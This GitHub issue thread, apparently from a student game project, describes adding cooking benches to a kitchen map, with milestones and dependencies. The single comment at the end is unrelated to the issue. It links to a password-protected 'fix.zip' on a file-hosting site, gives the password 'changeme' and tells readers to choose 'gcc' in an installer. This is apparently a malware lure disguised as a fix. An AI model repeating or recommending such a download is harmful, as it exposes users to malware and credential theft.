### ISSUE TITLE
Adding cooking benches

### ISSUE THREAD

**Issue by danhdinh98** [UQcsse3200/2024-studio-3#75]
# **Description**
**Task:** [Adding cooking benches](#3).
**Feature:** [https://github.com/UQcsse3200/2024-studio-3/issues/2](#2)

Added benches to the kitchen section of the map including a horizontal bottom and top bench, vertical left and right bench, and vertical center benches. This includes creating a spawnBenches function which spawns designed benches onto the map at specific coordinates. 
 
## **Example**
- **Bench Benefits**: Benches add the ability for future feature implementations of kitchen plates, sinks, garbage bins, etc. to be built on top of bench layout. Bench layout also contributes to the kitchen theme and provides a sense of player navigation to the map.

# **Dependencies**
- [x] Texture needs to be created for horizontal and vertical benches (#55)
- [x] Rough map layout needs to be designed for understanding of position and dimension of benches (#56)
 
# **Milestones**
List of steps that need to be completed for this task.
- [x] Importing bench assets (Aug. 23)
- [x] Spawning and rendering benches on main game screen (Aug. 26)
- [x] Updating position and dimensions to update map design (Aug. 27)
 
**Completion Deadline:** Aug. 28
 
# **Documentation**
- [Map design](../wiki/Map-Design)
 
# **Member**
- Danh (@danhdinh98) (Danh Dinh)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
